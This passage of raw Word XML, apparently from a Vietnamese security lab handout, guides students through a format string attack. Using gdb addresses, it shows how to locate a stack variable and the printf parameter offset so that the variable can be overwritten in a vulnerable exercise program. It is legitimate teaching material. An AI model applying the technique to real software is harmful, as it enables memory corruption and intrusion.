                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="k"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="k"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mh"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0x12345678</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44AD5EE3" w14:textId="0C466DA9"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Pr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>puts</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="00815A12">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidR="00AF534E">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">You </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>modified b for a big number!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1DF518" w14:textId="34095238" w:rsidR="00153D16" w:rsidRDefault="00153D16" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A3EAE2" w14:textId="6B6870DF" w:rsidR="00264C13" w:rsidRPr="00D04F54" w:rsidRDefault="00264C13" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">      printf(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="00561F5B">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a = %d, b = %x, c = %d</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, a, b, c);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A507042" w14:textId="77777777" w:rsidR="00153D16" w:rsidRPr="00D04F54" w:rsidRDefault="00153D16" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="k"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AEF8C4F" w14:textId="77777777" w:rsidR="00153D16" w:rsidRDefault="00153D16" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AA214E8" w14:textId="75CC2C49" w:rsidR="00B7224F" w:rsidRDefault="00B7224F" w:rsidP="00FC3418">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3418">
        <w:t>Ghi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đè bộ nhớ ngăn xếp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t> </w:t>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837271" w14:paraId="5B59DD1F" w14:textId="77777777" w:rsidTr="0072589C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9495" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="0070C0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4936EE1E" w14:textId="5E8696F2" w:rsidR="00837271" w:rsidRPr="00B46B41" w:rsidRDefault="00837271" w:rsidP="004D37DB">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="11" w:name="_Hlk117855866"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Sinh viên khai thác và truyền chuỗi s để ghi đè biến </w:t>
            </w:r>
            <w:r w:rsidRPr="00435DB1">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> của file </w:t>
            </w:r>
            <w:r w:rsidRPr="00153D16">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>stack-overwrite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> thành giá trị </w:t>
            </w:r>
            <w:r w:rsidRPr="00435DB1">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>. Giải thích ý nghĩa của chuỗi định dạng và lý do có thể in được giá trị cần thiết.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="11"/>
    <w:p w14:paraId="45423378" w14:textId="09A8D007" w:rsidR="000E5D34" w:rsidRPr="007A46AD" w:rsidRDefault="00A268C5" w:rsidP="007A46AD">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Xác </w:t>
      </w:r>
      <w:r w:rsidR="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:r w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> địa chỉ</w:t>
      </w:r>
      <w:r w:rsidR="000E5D34" w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cần ghi đè</w:t>
      </w:r>
      <w:r w:rsidR="00B00B54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (overwrite addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E3777D" w14:textId="20E3BD01" w:rsidR="00A268C5" w:rsidRDefault="00B00B54" w:rsidP="00B02CC3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Biến c là biến cục bộ, do đó nằm trong stack frame của hàm main</w:t>
      </w:r>
      <w:r w:rsidR="00B02CC3" w:rsidRPr="00D75B27">
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:t>Trong source code của app-overwrite có dòng code 6 giúp in ra địa chỉ của biến c này.</w:t>
      </w:r>
      <w:r w:rsidR="00AA7039">
        <w:t xml:space="preserve"> Lưu ý: khi debug và khi chạy địa chỉ này sẽ khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B42BA" w14:textId="2D5DEFCB" w:rsidR="009C348E" w:rsidRDefault="009C348E" w:rsidP="009C348E">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07C5070E" wp14:editId="58F76E24">
            <wp:extent cx="3254119" cy="769868"/>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769" cy="780905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECAB2ED" w14:textId="77777777" w:rsidR="00470F05" w:rsidRDefault="00D140FA" w:rsidP="00B00B54">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="357" w:hanging="357"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D140FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Xác định </w:t>
      </w:r>
      <w:r w:rsidR="001805C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>overwrite addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553087D2" w14:textId="7BF374E6" w:rsidR="00470F05" w:rsidRDefault="008A4C43" w:rsidP="00470F05">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do c nằm strong stack, </w:t>
      </w:r>
      <w:r w:rsidR="005E3CCE">
        <w:t>địa chỉ có thể khác nhau giữa lúc debug và chạy chương trình.</w:t>
      </w:r>
      <w:r w:rsidR="00470F05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E3CCE">
        <w:t>Ví dụ trong gdb, t</w:t>
      </w:r>
      <w:r w:rsidR="00470F05">
        <w:t>a thấy được</w:t>
      </w:r>
      <w:r w:rsidR="00470F05" w:rsidRPr="00CB18D9">
        <w:t xml:space="preserve"> biến c được lưu trữ tại </w:t>
      </w:r>
      <w:r w:rsidR="00470F05" w:rsidRPr="00470F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0xffffd1ac</w:t>
      </w:r>
      <w:r w:rsidR="005E3CCE">
        <w:t>, khác lúc chạy</w:t>
      </w:r>
      <w:r w:rsidR="00470F05">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607720C1" w14:textId="2393D0A6" w:rsidR="00470F05" w:rsidRPr="008A4C43" w:rsidRDefault="00470F05" w:rsidP="008A4C43">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D78B407" wp14:editId="1A9F7505">
            <wp:extent cx="4127927" cy="2279015"/>
            <wp:effectExtent l="0" t="0" r="6350" b="698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37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4145718" cy="2288837"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43956F77" w14:textId="4415B4F9" w:rsidR="00D140FA" w:rsidRPr="00E72704" w:rsidRDefault="00B720D4" w:rsidP="00B00B54">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="357" w:hanging="357"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Xác định </w:t>
      </w:r>
      <w:r w:rsidR="00B00B54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>overwrite offset</w:t>
      </w:r>
      <w:r w:rsidR="00D140FA" w:rsidRPr="00D140FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hay thứ tự tham số</w:t>
      </w:r>
      <w:r w:rsidR="00645F96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> của printf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4708DB3A" w14:textId="68A53CFB" w:rsidR="00B7224F" w:rsidRDefault="00002223" w:rsidP="00E72704">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bước này được thực hiện tương tự như </w:t>
      </w:r>
      <w:r w:rsidRPr="00002223">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ở phần </w:t>
      </w:r>
      <w:r w:rsidRPr="00002223">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B.2.</w:t>
      </w:r>
      <w:r w:rsidR="00FB738E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006971B2" w:rsidRPr="006971B2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF857D" w14:textId="5E3AE09A" w:rsidR="00C10544" w:rsidRDefault="003F1838" w:rsidP="00CB18D9">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Debug chương trình, </w:t>
      </w:r>
      <w:r w:rsidR="00C10544">
        <w:t xml:space="preserve">quan sát các tham số dành cho scanf, </w:t>
      </w:r>
      <w:r w:rsidR="00547F76">
        <w:t xml:space="preserve">ta </w:t>
      </w:r>
      <w:r w:rsidR="00CB18D9" w:rsidRPr="00CB18D9">
        <w:t xml:space="preserve">xác định </w:t>
      </w:r>
      <w:r w:rsidR="003E4F7F">
        <w:t xml:space="preserve">được chuỗi s </w:t>
      </w:r>
      <w:r w:rsidR="00C10544">
        <w:t>sẽ</w:t>
      </w:r>
      <w:r w:rsidR="003E4F7F">
        <w:t xml:space="preserve"> được lưu ở</w:t>
      </w:r>
      <w:r w:rsidR="00CB18D9" w:rsidRPr="00CB18D9">
        <w:t xml:space="preserve"> địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="008861F3" w:rsidRPr="00C10544">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00C10544" w:rsidRPr="00C10544">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ffffd148</w:t>
      </w:r>
      <w:r w:rsidR="00C10544">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E4F7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5049E861" w14:textId="32D56518" w:rsidR="00C10544" w:rsidRDefault="00C10544" w:rsidP="00C10544">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F941313" wp14:editId="210784FC">
            <wp:extent cx="4901898" cy="2507470"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4917826" cy="2515618"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C23A356" w14:textId="11654D66" w:rsidR="00303361" w:rsidRDefault="00303361" w:rsidP="00CB18D9">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp tục debug đến lệnh gọi hàm printf()</w:t>
      </w:r>
      <w:r w:rsidR="00401653">
        <w:t xml:space="preserve"> thứ 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ta thấy được tham số của nó bắt đầu từ vị trí </w:t>
      </w:r>
      <w:r w:rsidRPr="00303361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0xffffd130</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A4330" w14:textId="099241EF" w:rsidR="00303361" w:rsidRDefault="00303361" w:rsidP="00303361">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF82126" wp14:editId="02EFEE08">
            <wp:extent cx="4824523" cy="245828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3145" cy="2462675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F65069" w14:textId="25BDD0D3" w:rsidR="00204531" w:rsidRPr="00F45BA6" w:rsidRDefault="00303361" w:rsidP="00F45BA6">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Như vậy</w:t>
      </w:r>
      <w:r w:rsidR="00CB18D9" w:rsidRPr="00CB18D9">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002C7606">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C7606" w:rsidRPr="002C7606">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">vị trí lưu chuỗi định dạng </w:t>
      </w:r>
      <w:r w:rsidR="00D92449">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">s sẽ </w:t>
      </w:r>
      <w:r w:rsidR="002C7606" w:rsidRPr="002C7606">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>tương ứng với tham số thứ mấy của printf?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74C812" w14:textId="0986C803" w:rsidR="004C665B" w:rsidRPr="004C665B" w:rsidRDefault="00843C04" w:rsidP="002C7606">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="357" w:hanging="357"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xác định</w:t>
      </w:r>
      <w:r w:rsidR="002C7606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> chuỗi định dạng để g</w:t>
      </w:r>
      <w:r w:rsidR="004C665B" w:rsidRPr="004C665B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hi đè</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354A96CB" w14:textId="18280126" w:rsidR="00040210" w:rsidRDefault="002C7606" w:rsidP="000E2922">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
